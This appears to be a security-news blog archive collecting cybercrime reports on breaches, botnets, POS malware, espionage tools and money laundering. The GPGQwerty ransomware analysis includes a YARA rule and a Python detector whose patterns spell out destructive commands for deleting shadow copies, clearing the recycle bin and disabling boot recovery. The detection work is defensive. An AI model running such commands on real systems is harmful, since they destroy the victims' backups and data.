Category Archives: Cybercrime

Cybercrime Profits Total Nearly $200 Billion Each Year, Study Reveals

Illegal cybercrime profits total as much as $200 billion each year, according to an academic study into cybercriminals’ money laundering schemes.

Virtualization-based security firm Bromium announced some of the findings from its nine-month “Into the Web of Profit” study into how cybercriminals launder money online. The report revealed that cybercrime funds make up between 8 and 10 percent of illegal profits laundered across the world. Those figures place global ill-gotten proceeds at $80 billion to $200 billion annually.

Digital Currencies Driving Cybercrime Profits

Virtual currencies have become the primary tools threat actors use to launder money. They could play an even bigger role in future illicit transactions. According to the study, cybercriminals are increasingly using digital money to purchase real estate, with cryptocurrencies expected to account for 25 percent of total property sales in the next few years.

Even so, law enforcement is more intent on monitoring bitcoin, which is driving cybercriminals to look for alternatives, the study found. Some bad actors could turn to Litecoin, the second-most popular cryptocurrency on the Dark Web. Others are expected to embrace in-game currency and goods from “Grand Theft Auto V,” “Minecraft” and other computer games.

The Cybercrime Economy

Dr. Mike McGuire, senior lecturer in criminology at Surrey University in England, conducted the study under Bromium’s sponsorship. His research revealed that cybercrime is more than just a business.

“It’s like an economy which mirrors the legitimate economy,” said McGuire, as quoted by Dark Reading. “The problem here is the cyber economy and the legitimate economy is so intertwined that some laundering is going on in cyber, then back to the real world, then back to cyber.”

McGuire will present further findings from “Into the Web of Profit” during his speaker slot at the RSA Conference 2018 in San Francisco on April 20.

The post Cybercrime Profits Total Nearly $200 Billion Each Year, Study Reveals appeared first on Security Intelligence.

Understanding email fraud: Do you have visibility into email threats?

82% of boards are concerned with email fraud, and 59% consider it a top security risk – no longer just an IT issue. Yet 30% of respondents to a survey conducted by Censuswide cited a lack of executive support as a key challenge to email fraud protection deployment, according to Proofpoint. “Email fraud is highly pervasive and deceptively simple; hackers don’t need to include attachments or URLs, emails are distributed in fewer volumes, and typically … More

The post Understanding email fraud: Do you have visibility into email threats? appeared first on Help Net Security.

A look inside the big business of cybercrime

For three months, Armor’s Threat Resistance Unit (TRU) research team compiled and analyzed data from the black market to shed light on the type of activity threat actors are participating in and how underground forums operate in the burgeoning industry. Just as big businesses operate based on regulations, the laws of supply and demand, and even customer reviews, so does the black market. However, unlike the legitimate economy, the underground market is highly anonymized and … More

The post A look inside the big business of cybercrime appeared first on Help Net Security.

Frost Bank announced it has suffered a data breach that exposed check images

On Friday, Frost Bank announced that it has suffered a data breach that exposed check images; crooks could use them to forge checks.

Frost Bank announced on Friday that it has suffered a data breach that exposed check images.

The bank, a subsidiary of Cullen/Frost Bankers, Inc., discovered unauthorized access to its systems containing images of checks.

Attackers compromised a third-party lockbox software program and in this way were able to access the images of checks stored electronically in the database.

“In March 2018, Frost detected unauthorized access into a third-party lockbox software program that allowed unauthorized users to view and copy images of checks stored electronically in the image archive.” reads the security advisory published by the company.

“The identified incident did not impact other Frost systems. We have stopped the unauthorized access, and have reported the incident to and are cooperating with law-enforcement authorities.”

Lockbox services are normally used by customers to send payments to a central post office box; once the bank receives the payments, it credits them to the business’s account.

According to Frost Bank, its other systems weren’t impacted by the security breach.

The bad news is that crooks, once they obtained the images, could use them to forge checks.

“Information from the accessed images can be used to forge checks.” continues the advisory.


According to Frost Bank, the unauthorized access was limited to one software program serving about 470 commercial customers who use the electronic lockbox.

The company confirmed it stopped the identified unauthorized access once it discovered the breach.

Law enforcement is investigating the case, while Frost Bank hired an unnamed cybersecurity firm to investigate the security breach.

“At Frost, we care deeply about taking care of our customers and protecting their information, and we regret that this situation has occurred. We are working very hard to make things right,” Frost Chairman and CEO Phil Green said in a statement.


Pierluigi Paganini

(Security Affairs – Frost Bank, data breach)

The post Frost Bank announced it has suffered a data breach that exposed check images appeared first on Security Affairs.

SecurityWeek RSS Feed: Coverity Scan Hacked, Abused for Cryptocurrency Mining

Coverity Scan, a free service used by tens of thousands of developers to find and fix bugs in their open source projects, was suspended in February after hackers breached some of its servers and abused them for cryptocurrency mining.

Synopsys, which acquired Coverity in 2014, started notifying Coverity Scan users about the breach on Friday. The company said malicious actors gained access to Coverity Scan systems sometime in February.

“We suspect that the access was to utilize our computing power for cryptocurrency mining,” Synopsys told users. “We have not found evidence that database files or artifacts uploaded by the open source community users of the Coverity Scan service were accessed. We retained a well-known computer forensics company to assist us in our investigation.”

Synopsys says the service is now back online and it believes the point of access leveraged by the attackers has been closed. In order to regain access to Coverity Scan, users will need to reset their passwords.

“Please note that the servers in question were not connected to any other Synopsys computer networks. This should have no impact on customers of our commercial products, and this event did not put any Synopsys corporate data or intellectual property at risk,” users were told.

Cybercriminals have become increasingly interested in making a profit by hacking PCs and servers and abusing them to mine cryptocurrencies. Cryptocurrency mining malware can target a wide range of devices, including industrial systems.

One recent high-profile victim was the carmaker Tesla, whose Kubernetes pods were compromised and used for cryptocurrency mining. According to RedLock, which discovered the breach, hackers gained access to Tesla’s Kubernetes console due to the lack of password protection.

Related: Avoid Becoming a Crypto-Mining Bot - Where to Look for Mining Malware and How to Respond

Related: Linux Malware Targets Raspberry Pi for Cryptocurrency Mining

Eduard Kovacs is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.


Ransomware Takes Open-Source Path, Encrypts With GNU Privacy Guard

McAfee Labs has recently observed a new variant of ransomware that relies on the open-source program GNU Privacy Guard (GnuPG) to encrypt data. GnuPG is a hybrid-encryption software program that uses a combination of conventional symmetric-key cryptography for speed and public-key cryptography to ease the secure key exchange. Although ransomware using GnuPG to encrypt files is not unique, it is uncommon.

We analyzed the following SHA-256 hashes of the malware GPGQwerty:

  • 2762a7eadb782d8a404ad033144954384be3ed11e9714c468c99f0d3df644ef5
  • 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9ae558a41841e502
  • f5cd435ea9a1c9b7ec374ccbd08cc6c4ea866bcdc438ea8f1523251966c6e88b

We found that these binaries need many support files to execute successfully; the three files by themselves will not encrypt anything. GPGQwerty consists of a bundle of files that run together to encrypt a victim’s machine. The bundle comprises ten files:

This ransomware was first seen at the beginning of March. Generally, this type of malware spreads by spam email, malicious attachments, exploits, or fraudulent downloads. The binary 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9ae558a41841e502 was spotted in the wild at hxxp://; it may be part of a drive-by download strategy or was hosted on a legitimate site.

Key.bat, run.js, and find.exe are three files that play a vital role in the encryption process. The infection process follows this path:


The binary find.exe has eight sections and the raw size of its .bss section is zero.

It also has an unusual time and date stamp:

The file includes malicious thread local storage (TLS) callbacks as an anti-analysis trick. This technique lets an executable register TLS callback functions that run before execution reaches the AddressOfEntryPoint field (the normal execution start point of a binary) recorded in the executable header.

The action starts with the execution of the batch file key.bat. It imports the key and launches find.exe on the victim’s machine by executing the JavaScript run.js. The contents of the batch and JavaScript files are shown in the following snippet:

This ransomware kills selected running tasks using the command-line utility taskkill. This command can kill a task or process either by process ID or by image filename. In the following snippet, we see it forcefully terminating processes by their image names.

The ransomware tries to encrypt data using GnuPG (gpg.exe). The malware appends the extension .qwerty to the encrypted files:

The malware overwrites the original files using shred.exe:

After encryption, the ransomware allots a unique ID that identifies each victim. It also creates a .txt file that states all files on the computer have been locked and the victim must pay to decrypt the files.

GPGQwerty deletes the recycle bin using the Windows utility del:

Using the command “vssadmin.exe Delete Shadows /All /Quiet,” the ransomware silently removes the volume shadow copies (vssadmin.exe, wmic.exe) from the target’s system, thus preventing the victim from restoring the encrypted files. It also deletes backup catalogs (wbadmin.exe) and disables automatic repair at boot time (bcdedit.exe):

Finally, it creates the ransom note readme_decrypt.txt in each folder that holds an encrypted file. The ransom note gives instructions to communicate with an email address within 72 hours to arrange payment.
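The chain above (gpg.exe with --recipient qwerty, shred.exe, deletion of the recycle bin and shadow copies, wbadmin and bcdedit) gives a behavioural detection that complements a static rule. The Python below is an added example, not McAfee's code: it scores constructed process-creation events per host and alerts when several stages of the chain appear together; the wbadmin, bcdedit and wmic command-line patterns are assumed, since the write-up names those tools but quotes only the vssadmin command.

```python
import re
from collections import defaultdict

# Behaviours named in the analysis, as regexes over the process command line.
# The wmic, wbadmin and bcdedit patterns are assumed: the write-up names the
# tools but quotes only the vssadmin command line.
STAGES = {
    "gpg_encrypt":     re.compile(r"gpg\.exe\b.*--recipient\s+qwerty", re.I),
    "shred_overwrite": re.compile(r"\bshred\.exe\b", re.I),
    "recycle_bin_del": re.compile(r"\bdel\s+/Q\s+/F\s+/S\s+\S*\$recycle\.bin", re.I),
    "shadow_delete":   re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\s+/all\s+/quiet", re.I),
    "wmic_shadow_del": re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),        # assumed
    "backup_catalog":  re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog", re.I),        # assumed
    "boot_repair_off": re.compile(r"\bbcdedit(?:\.exe)?\b.*recoveryenabled\s+no", re.I),   # assumed
    "ransom_note":     re.compile(r"readme_decrypt\.txt", re.I),
}

# A lone shadow-copy deletion also happens during legitimate admin work; the
# combination of stages on one host is what carries the verdict.
ALERT_THRESHOLD = 3


def parse_event(line):
    """'<ts> <host> <image> <cmdline>' -> dict, or None for a malformed line."""
    parts = line.strip().split(" ", 3)
    if len(parts) != 4:
        return None
    ts, host, image, cmdline = parts
    return {"ts": ts, "host": host, "image": image, "cmdline": cmdline}


def match_stages(cmdline):
    """Names of every chain stage whose pattern occurs in one command line."""
    return {name for name, rx in STAGES.items() if rx.search(cmdline)}


def score_hosts(lines):
    """{host: sorted stage names} for every host with at least one stage hit."""
    seen = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        seen[ev["host"]].update(match_stages(ev["cmdline"]))
    return {h: sorted(s) for h, s in seen.items() if s}


def alerts(lines):
    """Hosts whose distinct stage count reaches ALERT_THRESHOLD."""
    return {h: s for h, s in score_hosts(lines).items() if len(s) >= ALERT_THRESHOLD}


# Constructed sample: one infected workstation and one server where an admin
# legitimately cleared shadow copies.
SAMPLE_EVENTS = [
    "2018-03-10T09:01:02 WS01 cmd.exe cmd.exe /c key.bat",
    '2018-03-10T09:01:05 WS01 gpg.exe gpg.exe --recipient qwerty -o "C:\\Users\\a\\report.docx.1.qwerty" --encrypt "C:\\Users\\a\\report.docx"',
    '2018-03-10T09:01:06 WS01 shred.exe shred.exe -f -u "C:\\Users\\a\\report.docx"',
    "2018-03-10T09:02:10 WS01 cmd.exe cmd.exe /c del /Q /F /S C:\\$recycle.bin",
    "2018-03-10T09:02:11 WS01 vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet",
    "2018-03-10T09:02:12 WS01 wbadmin.exe wbadmin.exe delete catalog -quiet",
    "2018-03-10T09:02:13 WS01 bcdedit.exe bcdedit.exe /set {default} recoveryenabled No",
    "2018-03-10T11:30:00 SRV02 vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet",
    "malformed line",
]

if __name__ == "__main__":
    for host, stages in alerts(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```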

This Yara rule detects GPGQwerty:

rule crime_ransomware_windows_GPGQwerty: crime_ransomware_windows_GPGQwerty
{
    meta:
        author = "McAfee Labs"
        description = "Detect GPGQwerty ransomware"

    strings:
        $a = "gpg.exe --recipient qwerty  -o"
        $b = "%s%s.%d.qwerty"
        $c = "del /Q /F /S %s$recycle.bin"
        $d = ""

    condition:
        all of them
}

McAfee advises all users to keep their antimalware products up to date. McAfee products detect this malware as Ransomware-GKF! [Partial hash] with DAT Versions 8826 and later. For more on combatin

The post Ransomware Takes Open-Source Path, Encrypts With GNU Privacy Guard appeared first on McAfee Blogs.

The Ripple Effect of the Hansa Takedown

For nearly a decade we have witnessed the systemic rise and fall of “dark net” markets. Each time a site is taken down by law enforcement, we see other, opportunistic ones capitalize on buyers looking for new places to purchase illegal goods. Last year we explored the takedowns of the popular black markets AlphaBay and Hansa and saw a noticeable hesitation. Something about these takedowns had an impact, even if short-term, among buyers and sellers on dark net markets. After examining the flow of crime across the dark web following the siege of these two sites, we have found that these takedowns had a noticeable impact.

AlphaBay was a massive marketplace and had been the top market since the year following the Silk Road takedown. Once AlphaBay was stopped last year, we began tracking the cybercriminal response and saw the migration to smaller markets, including Hansa, which had an influx of new vendors and buyers shortly after AlphaBay disappeared. This is similar to the behavior we saw after the Silk Road takedown. Orphaned users needed a new home and migrated to newer markets such as Dark Market Reloaded, Evolution, Silk Road 2.0, and eventually AlphaBay. Some of these turned out to be scams—as seen with Evolution—or were subject to law enforcement takedowns—as was the case with Silk Road 2.0 in Operation Onymous. Dark net markets are no strangers to risk.

Although AlphaBay was a large takedown, it had a similar impact to many dark net market exits before it. However, the follow-up Hansa takedown was an unexpected blow and likely a heavy psychological hit. Criminals predictably flocked to several other markets, including Hansa. Law enforcement was ready for them: it had hijacked the two administrators’ accounts, migrated the market to a different infrastructure and held full control of Hansa for almost a month over the course of the operation. During this period, law enforcement ran a trap that undermined the trust of a lot of buyers and sellers. Criminals were unaware, migrating from market to market and assuming they were untouchable in a game of whack-a-mole. They were proven wrong. By using a variety of methods, the law enforcement agencies involved identified a large portion of vendors and buyers, disrupting both confidence and trust.

After it was publicly announced that Hansa was under the control of law enforcement, panic started to spread in the dark net market community and on social media. Even vendors on other markets were no longer trusted. Reports on Reddit came out that their PGP keys had somehow been changed, creating much confusion. In the eyes of the paranoid, everyone was compromised. Despite the increased distrust, many markets survived, including one of the largest dark markets today, Dream Market. However, migration to these markets was slow. The seemingly business-as-usual takedown of AlphaBay, followed by the complete takeover of Hansa, had made its mark.

Dark markets continue to grow and survive. As long as the profitability of dark net markets is viable, they will continue to emerge. Stolen digital data, which drives much of the profits, will continue to be a key motivator. As long as there is a market, we must secure our data. This effort starts by being diligent about protecting our assets.

There are a few key ways to reduce risk. For businesses and individuals, this includes maintaining proper procedures and practices that ensure good security hygiene. Never share data unless the requester is trusted and sharing is absolutely necessary. And always use a security infrastructure that safeguards the data centers or cloud storage your organization uses to collect and store crucial data.

To learn more about our fight against cybercrime, be sure to follow us at @McAfee and @McAfee_Labs.

The post The Ripple Effect of the Hansa Takedown appeared first on McAfee Blogs.

A week in security (March 12 – March 18)

Last week on Malwarebytes Labs, we took a look at the inner workings of a fileless attack, explored what happened in a zero day ransomware attack aimed at South Koreans, gave you hints and tips for avoiding cold calls, and took a deep dive into the secretive world of GrayKey.


Stay safe, everyone!

The post A week in security (March 12 – March 18) appeared first on Malwarebytes Labs.

The Book: Digging the Deep Web: Exploring the dark side of the web

My new book, titled ‘Digging the Deep Web: Exploring the dark side of the web’, is available online; enjoy it.

It’s a pleasure and an honor for me to announce the availability of my book

Digging the Deep Web: Exploring the dark side of the web

Kindle Edition — Paper Copy

Digging The Deep Web

What is the Deep Web and what are darknets? The book provides a detailed overview of the cybercriminal underground in the hidden part of the web.
The book details the criminal activities associated with threat actors, detailing their techniques, tactics, and procedures. 

The Dark Web is considered the realm of crooks and cyberspies; it is a privileged environment for hackers, but also the scammers’ paradise.

Cyber terrorists, hackers, cyber criminals and intelligence agencies crowd this portion of the web, and the book explains how these actors interact and what their modus operandi is.

Enjoy the book:

Kindle Edition

Paper Copy


Pierluigi Paganini

(Security Affairs – cybercrime, Dark Web)

The post The Book: Digging the Deep Web: Exploring the dark side of the web appeared first on Security Affairs.

Cyber Criminals Launder Billions with Bitcoin, In-game Loot

Cyber criminals are laundering billions of ill-gotten gain using crypto currencies like Bitcoin and Monero and in-game currencies for popular online games like World of Warcraft, FIFA Soccer and Grand Theft Auto.  Research sponsored by the security firm Bromium and conducted by researchers at Surrey University in England found that cyber...


7 Digital Safety Tips for Teens Filing Their First Tax Returns

Landing that first part-time job in high school and filing your first tax return is a rite of passage for a young person. So why am I so anxious about my daughter becoming a taxpayer and sharing her pristine personal data with the U.S. government?

Where do I begin? The fact is, the more widely her personal information travels, the more digital risks she faces. Adding to my angst is my own experience with identity theft over a decade ago that still haunts me and is the last stress I’d wish upon my child or anyone else’s.

So as my daughter waves her W-2 at me and elatedly chatters about how she’s going to spend her refund, I — like so many other parents across the country — put on my coach’s hat for a key talk around the digital risks that come with tax season.

7 Tax Filing Safety Tips for Families

  1. Allow your child to file. Sometimes it’s easier just to file a 1040-EZ form for your child and be done with it. The wiser route is to take the time to teach your child the few steps needed to file correctly and the legal reasons we all must pay taxes. Part of this discussion is going over the digital risks of tax season such as identity theft, malware and viruses, and tax fraud.
  2. Discuss the power of a SSN. Talk about the responsibility and power of owning a Social Security Number (SSN) and why it must be safeguarded. A SSN is the most critical piece of government-issued identification an American citizen can possess. It is tied to personal credit and identification, and is the primary way the government tracks an individual’s earnings over his or her lifetime. The SSN is the golden ticket for cyber thieves who make a career of stealing and selling social security numbers and identities online.
  3. Secure all digital doorways. One of the ways cyber thieves gain access to personal information is through hacking, and the best way to slam that door is by creating strong passwords. Easy passwords are the #1 way hackers unlock our data. Tax time is a perfect opportunity to challenge your child to create stronger passwords for all of his or her devices and email accounts. At the same time you upgrade password security, make sure updates on software, PCs, phones, and web browsers are current to protect your devices against viruses and malware that can grab login information.
  4. File early. Start the habit of early filing. The sooner you file your tax return and teach your child to do the same, the more you lessen the chance of a thief using yours or your child’s identity to claim a refund before your return goes through. According to the Identity Theft Resource Center, tax return fraud is on the rise due to more significant security breaches and the number of identities now for sale online.
  5. Be overly cautious every step of the way. Use a reputable firm or company to handle your and your child’s tax returns. Legitimate tax preparers must sign all forms with their IRS preparer identification number. If you end up filing the 1040-EZ form on paper, be sure to hand deliver your returns to the post office mailbox. Thieves target March and April as prime time for stealing tax information from curbside, residential mailboxes. Filing online? That’s fine if you make sure you do so over secured Wi-Fi. The local coffee shop or library isn’t going to protect your tax information from unscrupulous, prying eyes. Look for the HTTPS web designation at the front of the Internal Revenue System’s web address before submitting your documents.
  6. File a fraud alert. Because your child has rarely used his or her social security number, set up a fraud alert. By submitting a fraud alert in your child’s name with the three main credit bureaus several times a year, you will be able to catch any credit fraud early. Since your child hasn’t built any credit, anything that comes back will be illegal activity. The fraud alert will remain in place for only 90 days. When the time runs out, you’ll need to reactivate the alert. You can achieve the same thing by filing an earnings report from the Social Security Administration. The report will reveal any earnings acquired under your child’s social security number.
  7. Celebrate. Tax time tends to bring out the anxiety in just about everyone. Change that mentality with your child if possible. Make tax time rewarding. Go out for a celebration dinner or dessert. Congratulate him or her on filing safely and responsibly. And, don’t forget to recognize the even bigger accomplishment of stepping into the workforce and taking on the challenge of a first job.

This post is the first of a two-part series focused on digital safety during tax season. Next week, we will highlight some of the scams thieves use and how to safeguard your family.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post 7 Digital Safety Tips for Teens Filing Their First Tax Returns appeared first on McAfee Blogs.

China-linked Hackers Target Engineering and Maritime Industries

A China-related cyberespionage group that has been active for half a decade has increased its attacks on engineering and maritime entities over the past months, FireEye reports.

Referred to as Leviathan or TEMP.Periscope, the group has been historically interested in targets connected to South China Sea issues, which hasn't changed in the recently observed attacks. Targets include research institutes, academic organizations, and private firms in the United States.

“The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit,” FireEye says.

Over the years, the group has also shown interest in professional/consulting services, high-tech industry, healthcare, and media/publishing. Most of the identified victims were in the United States, with some located in Europe and at least one in Hong Kong.

The group’s tactics, techniques, and procedures (TTPs), as well as its targets, overlap with those associated with the group called TEMP.Jumper, which in turn overlaps significantly with the NanHaiShu group.

The recently observed spike in activity also revealed the use of a broad range of malware that other suspected Chinese groups also use. These tools include backdoors, reconnaissance tools, file stealers, and webshells.

The first of the backdoors is Airbreak, a JavaScript-based tool that retrieves commands from hidden strings in compromised webpages and actor-controlled profiles on legitimate services.

A second backdoor is Badflick, which can modify the file system, generate a reverse shell, and modify its command and control (C&C) configuration.

Another similar piece of malware is Photo, a DLL backdoor that gets directory, file, and drive listing; creates a reverse shell; records the screen, video, and audio; lists, terminates, and creates processes; creates and modifies registry keys and values; logs keystrokes, returns usernames and passwords from protected storage; and can read, create, and modify files.

The group also used Homefry, a 64-bit Windows password dumper/cracker previously used along with the first two backdoors. Based on received commands, it can either display cleartext credentials for each login session, or can display cleartext credentials, NTLM hashes, and malware version for each login session.

Other tools employed by the hackers include Lunchmoney (which can exfiltrate files to Dropbox) and Murkytop, a command-line reconnaissance tool (which can execute files; move and delete files; schedule remote AT jobs; perform host discovery; scan for open ports in a connected network; and retrieve information about the operating system, users, groups, and shares on remote hosts).

In recent attacks, the group was also observed employing the China Chopper code injection webshell capable of executing Microsoft .NET code within HTTP POST commands (thus, it can upload and download files, execute applications, list directory contents, access Active Directory, access databases, and more).

Previously, the group used the Beacon backdoor (commercially available as part of the Cobalt Strike software platform), and the Blackcoffee backdoor that hides C&C communication as traffic to legitimate websites such as GitHub and Microsoft's TechNet portal.

The group has been also observed using spear phishing emails; lure documents attempting to exploit CVE-2017-11882 to drop malware; stolen code signing certificates to sign their malware; bitsadmin.exe and PowerShell to download additional tools; and Windows Management Instrumentation (WMI) and Windows Shortcut files (.lnk) for persistence.

“The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations,” FireEye concludes.

Related: Cyber Espionage Targets Interests in South China Sea


PinkKite POS Malware Is Small but Powerful

A newly discovered piece of malware targeting point-of-sale (POS) systems has a very small size but can do a lot on the infected systems, security researchers reveal.

Called PinkKite, the POS malware was observed last year as part of a large campaign that ended in December, but was only detailed last week at Kaspersky Lab’s Security Analyst Summit (SAS). Discovered by researchers at Kroll Cyber Security, the malware is believed to have appeared last year for the first time.

Similar to previously observed POS malware families such as TinyPOS and AbaddonPOS, the new PinkKite has a very small size (less than 6 KB) and uses its tiny footprint to evade detection. Despite this, the malware includes memory-scraping and data validation capabilities.

Furthermore, Courtney Dayter and Matt Bromiley, who detailed the threat at last week’s SAS 2018, reveal that PinkKite uses a hardcoded double-XOR cipher to encrypt credit card numbers. It also features built-in persistence mechanisms and a backend infrastructure that exfiltrates data to a clearinghouse rather than directly to a command and control (C&C) server, as POS malware typically does.

In fact, the PinkKite operators used three clearinghouses (or depots) that the malware sent data to in the observed campaign. These were located in South Korea, Canada and the Netherlands, the researchers revealed.

The use of clearinghouses likely made the data collection easier and allowed operators to distance themselves from the terminals, but it also made the operation very noisy.

For distribution purposes, the attackers likely infected a system and then moved laterally across the targeted company’s network environment using PsExec. Next, the hackers used Mimikatz to extract credentials from the Local Security Authority Subsystem Service (LSASS), and then connected to the compromised systems to steal credit card data via a Remote Desktop Protocol (RDP) session.

The PinkKite executable, the researchers discovered, attempts to pass as a legitimate Windows program and uses names such as Svchost.exe, Ctfmon.exe and AG.exe for that. Different versions of the malware exist, including a whitelist variant that specifically targets processes in a list, and a blacklist iteration that instead ignores certain processes.

After scraping credit card data from system memory, PinkKite validates card numbers using the Luhn algorithm. It then applies a double-XOR operation to encode the 16 digits of each credit card number with a predefined key, and stores the results in compressed files that can hold as many as 7,000 credit card numbers each.

The files are then sent over a separate RDP session to one of the clearinghouses; the researchers found that these remote systems held hundreds or thousands of malware output files.

The attackers were stealthy enough to stay under the radar until the targeted organization was alerted that its customers’ credit card data was being sold on the black market.

Travis Smith, principal security researcher at Tripwire, told SecurityWeek in an email that, even though this malware family has a small footprint, its size has little bearing on whether it can be detected.

“A change on a static endpoint like a point-of-sale machine will stick out clearly with the proper controls. Application whitelisting is a quick and very effective way to prevent malware such as PinkKite from being allowed to run on a point-of-sale machine. However, if the adversaries were able to use Mimikatz to steal admin credentials, they could bypass controls such as the built-in AppLocker available from Windows. Having layered controls which are designed for both mitigation and detection is key in a successful security architecture,” Smith said.

He also pointed out that the malware’s small size forced it to rely heavily on network communication, which can be prevented and detected.

“Since point-of-sale networks are also fairly static, any communication outside of an established baseline can be considered malicious until proven benign. Utilizing a whitelist set of firewall rules on the point-of-sale network will limit the malware from sending stolen credit cards to adversaries around the world,” Smith concluded.

Related: New PoS Malware Family Discovered

Related: POS Malware Abuses Exposed ElasticSearch Nodes for C&C

Cybercriminals launder money through mansions, private islands and crypto currency

Cybercriminal proceeds make up an estimated 8-10 percent of total illegal profits laundered globally, amounting to an estimated $80-$200 billion each year, according to a nine-month academic study by Dr. Mike McGuire, Senior Lecturer in Criminology at Surrey University.

Key research findings:

  • Virtual currencies have become the primary tool used by cybercriminals for money laundering
  • Cybercriminals are moving away from Bitcoin to less recognized virtual currencies, like Monero, that provide greater anonymity
  • In-game purchases and … More

The post Cybercriminals launder money through mansions, private islands and crypto currency appeared first on Help Net Security.

The RottenSys botnet is already composed of nearly 5 million Android devices

RottenSys – A Chinese crime ring is building a huge botnet that is already composed of nearly 5 million Android devices.

Researchers at Check Point discovered attackers infecting devices with a strain of malware, dubbed RottenSys, that aggressively displays ads on victims’ devices.

“The Check Point Mobile Security Team has discovered a new widespread malware family targeting nearly 5 million users for fraudulent ad-revenues. They have named it ‘RottenSys’ for in the sample we encountered it was initially disguised as a System Wi-Fi service.” reads the analysis of Check Point.

The experts started the investigation after finding an unusual self-proclaimed system Wi-Fi service (系统WIFI服务) on a Xiaomi Redmi phone. The researchers found that the service provides no Wi-Fi functionality at all; instead, it requests a long list of Android permissions.

The RottenSys malware implements two evasion techniques:

  • The first technique delays any malicious activity for a set period after installation.
  • The second is a dropper that shows no malicious behaviour on its own: once the device is active, it contacts the command and control (C&C) server, which returns a list of additional components to download.

The malicious code relies on two open-source projects:

  • The Small virtualization framework. RottenSys uses Small to create virtualized containers for its components, which lets the malware run parallel tasks and sidestep Android OS limitations.
  • The MarsDaemon library, which keeps apps “undead.” MarsDaemon keeps processes alive even after users close them, so the malware can keep injecting ads.

According to the experts, the botnet will have extensive capabilities, including silently installing additional apps and UI automation, so there is a risk that the operators will use it for more dangerous activities such as ransomware distribution.

“This botnet will have extensive capabilities including silently installing additional apps and UI automation. Interestingly, a part of the controlling mechanism of the botnet is implemented in Lua scripts. Without intervention, the attackers could re-use their existing malware distribution channel and soon grasp control over millions of devices.” continues the analysis.

RottenSys was first spotted in September 2016 and the number of victims has grown steadily since; at the time of writing, the number of infected devices stood at 4,964,460.

For now the malware targets only Chinese users: it is bundled into Chinese apps and mostly infects devices from Huawei, Xiaomi, OPPO, vivo, LeEco and Coolpad.


The attackers are financially motivated: according to Check Point, the botnet operators are currently making around $115,000 every ten days. The researchers estimated the revenue from impressions and clicks using conservative rates of 20 cents per click and 40 cents per thousand impressions.

Further info is included in the report published by Check Point.

Pierluigi Paganini

(Security Affairs – RottenSys, botnet)

The post The RottenSys botnet is already composed of nearly 5 million Android devices appeared first on Security Affairs.

Microsoft Publishes Bi-annual Security Intelligence Report (SIR)

Microsoft's 23rd bi-annual Security Intelligence Report (SIR) focuses on three topics: the disruption of the Gamarue (aka Andromeda) botnet, evolving hacker methodologies, and ransomware. It draws on the data analysis of Microsoft's global estate since February 2017, including 400 billion email messages scanned, 450 billion authentications, and 18+ billion Bing webpage scans every month; together with the telemetry collected from the 1.2 billion Windows devices that opt in to sharing threat data with Microsoft.

It is worth noting that Microsoft applies machine learning (ML) artificial intelligence to this data to tune its own security software. Since the efficiency of ML-based endpoint protection relies on both the algorithms employed, and the size of the data pool from which it learns, the implication is that Windows Defender has the potential to become an increasingly effective protection tool.


Gamarue was one of the largest botnets in the world. From 2011 it had evolved through five active versions and had been involved in distributing Petya and Cerber ransomware, Kasidet (aka the Neutrino bot), the Lethic spam bot, and data stealing malware such as Ursnif, Carberp and Fareit.

In partnership with ESET, Microsoft had been researching the Gamarue infrastructure and 44,000 associated malware samples, since December 2015. Details on 1,214 C&C domains and IPs, 464 distinct botnets and more than 80 malware families were collected and handed to law enforcement agencies around the world. On November 29, 2017, Gamarue's C&C servers were disconnected and replaced with a sinkhole.

Since the disruption, the sinkhole has collected the IP addresses of 23 million infected devices. Microsoft has watched the number of Gamarue-infected devices reduce month by month, from around 17 million in December 2017 to 14 million in January 2018, and less than 12 million in February. Johnnie Konstantas, senior director with the Microsoft Cybersecurity Enterprise Group, told SecurityWeek, "The team reached out to ISPs, law enforcement agencies and identified companies, and told them about the infected IPs. Those organizations could identify the individual infected devices and organize the mitigations -- which is what reduces the number of infected devices still connecting to the sink-hole." Microsoft does not use the botnet to directly warn the infected users; but ESET comments, "at least no new harm can be done to those compromised PCs."

Hacker routes

Over the last few years -- not least because of the introduction of machine learning techniques -- security protections have improved, and direct hacking has become more difficult and time-consuming. While still employed by well-resourced actors -- such as nation-state affiliated groups -- hackers in general have diverted their attention to the 'low-hanging fruit'. The SIR describes three of these routes: social engineering, poorly-secured cloud apps, and the abuse of legitimate software platform features.

Social engineering attacks are largely synonymous with phishing attacks. The SIR notes "a significant volume of phishing-based email messages at the very end of the year 2017. Phishing was the #1 threat vector (> 50%) for Office 365-based email threats in the second half of calendar year 2017." There are various tools available to help detect phishing, but some academics doubt that even machine learning techniques will be able to solve the problem.

Microsoft stresses the value of user awareness training. While users are often called 'the weakest link', they are also the first line of defense. Every well-trained user is effectively an individual human firewall.

The second of the low-hanging fruits is poorly secured cloud apps. "We studied about 30 of them," said Konstantas, "looking at the security measures they employed. First you want header security, to prevent attacks like cookie poisoning or cross-site scripting that take over the session. Then you also want encryption of data in motion between the end device and the cloud, and finally encryption of data at rest."

Microsoft found that about 79% of storage apps, and 86% of collaboration apps did not have all three measures. "They may have had one or two of the three," she continued, "but not all three. This is a big deal, because you're talking about potentially valuable corporate data accessible to adversaries, and also the possibility of malware infection coming back to the device." 
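
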